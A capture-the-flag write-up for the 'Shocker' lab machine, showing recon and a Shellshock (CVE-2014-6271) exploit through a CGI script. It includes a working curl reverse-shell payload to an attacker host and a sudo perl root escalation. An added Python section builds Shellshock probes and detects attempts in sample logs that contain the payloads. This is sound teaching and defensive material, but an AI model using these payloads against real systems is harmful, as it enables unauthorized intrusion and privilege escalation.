Shocker
Shocker Writeup
1. Recon
As usual, we start with Nmap: first a scan of all 65535 TCP ports at a high rate to find what is open, then default scripts and version detection (-sCV) against only those ports. Note that the first scan labels 2222 as EtherNetIP-1 purely because that is the /etc/services entry for the port number; the version scan shows it is actually OpenSSH on a non-standard port.
figueron@kali$ nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 06:29 EDT
Nmap scan report for 10.10.10.56
Host is up (0.025s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
figueron@kali$ nmap -p 80,2222 -sCV -oA scans/nmap-tcpscripts 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 06:30 EDT
Nmap scan report for 10.10.10.56
Host is up (0.018s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.35 seconds
Visiting the website, we see a simple page with a picture of a spider and the text "Don't bug me!".
2. Web Recon
Since the page itself gives us nothing to work with, we run feroxbuster to find hidden directories.
figueron@kali$ feroxbuster -u http://10.10.10.56 -f -n
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.2.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.56
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.2.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🪓  Add Slash             │ true
 🚫  Do Not Recurse        │ true
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403       11l       32w      294c http://10.10.10.56/cgi-bin/
403       11l       32w      292c http://10.10.10.56/icons/
403       11l       32w      300c http://10.10.10.56/server-status/
[####################] - 15s    29999/29999   0s      found:3       errors:0
[####################] - 14s    29999/29999   2039/s  http://10.10.10.56
This was the run that showed the most. The -f flag appends a trailing slash to every requested path (Apache answers /cgi-bin and /cgi-bin/ differently, so this surfaces directories a plain wordlist run can miss) and -n disables recursion. A 403 on a directory is still a find: the directory exists, only listing it is forbidden, so each of these matches is worth probing further.
Next, we repeat this for every match we found.
For /cgi-bin/ we try the .sh, .cgi and .pl extensions, because those are the usual script types placed there: cgi-bin is the directory from which Apache executes scripts server-side rather than serving them as files.
figueron@kali$ feroxbuster -u http://10.10.10.56/cgi-bin/ -x sh,cgi,pl
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.2.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.56/cgi-bin/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.2.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extensions            │ [sh, cgi, pl]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200        7l       17w        0c http://10.10.10.56/cgi-bin/user.sh
[####################] - 57s   359988/359988  0s      found:1       errors:0
[####################] - 57s   119996/119996  2089/s  http://10.10.10.56/cgi-bin/
We found a user.sh file. Let's see what it contains.
Requesting it through Burp and looking at the response, we see that user.sh is not served as a file but executed on the server: the response body is the output of the uptime command.
This is an example of what uptime prints:
figueron@kali$ uptime
07:08:38 up 5 days, 16:27, 35 users, load average: 0.00, 0.08, 0.18
3. CVE-2014-6271 (Shellshock)
After a bit of research, I found this interesting CVE.
info: "This vulnerability impacts the Bourne Again Shell (Bash). Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface (CGI)."
The mechanics are simple: Apache hands the request headers to a CGI script as environment variables (the User-Agent header becomes HTTP_USER_AGENT). An unpatched bash imports any environment variable whose value starts with () { as a function definition and, because of the bug, keeps executing whatever follows the closing brace. Since user.sh is a shell script run by bash, a crafted User-Agent gives us command execution as the web server user.
First start a listener on the attacker machine, then send the payload; the reverse shell connects back to the listener.
figueron@kali$ nc -lvnp <port>
figueron@kali$ curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1" http://10.10.10.56/cgi-bin/user.sh
Replace <ip> and <port> with the attacker machine's address and the port nc is listening on.
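The following Python script is an added example, not part of the original writeup: it models the CGI header-to-environment mapping that puts the User-Agent in front of bash, builds a non-destructive Shellshock probe (with the two echos that keep Apache from returning a 500 for a malformed CGI header block), and flags exploitation attempts in Apache access-log lines. The function names, the marker string, the detection regex and the sample log lines (10.10.14.2, the timestamps and port 443) are all constructed for the example; it does not contact any host.

```python
"""Added example (not from the original writeup): how a Shellshock payload
reaches bash through CGI, how to build a non-destructive probe, and how to
spot attempts in Apache access logs. All sample data below is constructed."""
import re

# Prefix that bash (before the CVE-2014-6271 fix) treated as an exported
# function definition when importing environment variables.
FUNC_PREFIX = "() {"


def cgi_env_from_headers(headers):
    """Map HTTP request headers to CGI/1.1 meta-variables the way mod_cgi does:
    upper-case, dashes to underscores, HTTP_ prefix. This is why an attacker-
    controlled User-Agent ends up as $HTTP_USER_AGENT in the script's environment."""
    env = {}
    for name, value in headers.items():
        key = name.upper().replace("-", "_")
        if key in ("CONTENT_TYPE", "CONTENT_LENGTH"):
            env[key] = value  # these two are passed without the HTTP_ prefix
        else:
            env["HTTP_" + key] = value
    return env


def shellshock_probe(command, marker="SHOCK-OK"):
    """Header value for a non-destructive check. The two echos emit an empty CGI
    header block so Apache returns the command output with a 200 instead of a 500
    ("malformed header from script"); the marker makes matching unambiguous.
    'command' runs as the web server user on a vulnerable host (marker is ours)."""
    return f"{FUNC_PREFIX} :;}}; echo; echo; echo {marker}; {command}"


def bash_would_execute(env_value):
    """True if an unpatched bash would parse this environment value as a function
    definition and then run whatever follows the closing brace (the actual bug).
    A plain exported function with nothing after the body is harmless."""
    if not env_value.startswith(FUNC_PREFIX):
        return False
    body_end = env_value.find("}")
    return body_end != -1 and env_value[body_end + 1:].strip(" ;") != ""


def is_vulnerable(response_body, marker="SHOCK-OK"):
    """Decide from the HTTP response body whether the probe's marker came back."""
    return marker in response_body


# Detection side: the payload shows up in the User-Agent field of the combined
# log format, but any header-derived field works, so the whole line is searched.
# Assumed pattern: function prefix, optional no-op body, closing brace, separator.
SHELLSHOCK_LOG_RE = re.compile(r"\(\)\s*\{\s*:?\s*;?\s*\}\s*;")


def is_shellshock_attempt(log_line):
    """Flag access-log lines carrying a function-definition prefix followed by a
    command separator; legitimate User-Agents never contain this sequence."""
    return SHELLSHOCK_LOG_RE.search(log_line) is not None


def flagged_lines(lines):
    """Return only the log lines that look like Shellshock attempts."""
    return [line for line in lines if is_shellshock_attempt(line)]


# Constructed Apache combined-format lines: one normal request, two attempts.
SAMPLE_LOG = [
    '10.10.14.2 - - [16/May/2021:06:40:01 -0400] "GET /cgi-bin/user.sh HTTP/1.1" '
    '200 42 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.14.2 - - [16/May/2021:06:41:13 -0400] "GET /cgi-bin/user.sh HTTP/1.1" '
    '200 0 "-" "() { :;}; /bin/bash -i >& /dev/tcp/10.10.14.2/443 0>&1"',
    '10.10.14.2 - - [16/May/2021:06:42:55 -0400] "GET /cgi-bin/user.sh HTTP/1.1" '
    '500 612 "-" "() { :; }; /bin/cat /etc/passwd"',
]


if __name__ == "__main__":
    env = cgi_env_from_headers({"User-Agent": shellshock_probe("id")})
    print("HTTP_USER_AGENT =", env["HTTP_USER_AGENT"])
    print("unpatched bash would execute it:", bash_would_execute(env["HTTP_USER_AGENT"]))
    for line in flagged_lines(SAMPLE_LOG):
        print("ATTEMPT:", line)
```

The reverse-shell payload on the page has no echos because nobody cares about the HTTP response once the shell has connected back; for a scanner that has to read the response, the empty header block matters. The regex is deliberately loose about whitespace because real attempts vary between `() { :;};` and `() { :; };`.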
4. Privilege Escalation
After getting a shell, we find we are the user shelly. We run sudo -l to see what we are allowed to run as root, and whether any of it needs no password.
shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
We can run perl as root without a password, so we use it to spawn a root shell: perl's exec replaces the privileged perl process with /bin/sh, which inherits root.
TIP: GTFOBins (https://gtfobins.github.io/) is the place to look whenever a common binary can be run with sudo, is SUID, or has capabilities; it lists known ways to abuse each one for a shell, file read or privilege escalation.
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
Now we can read the root flag.
Done !!

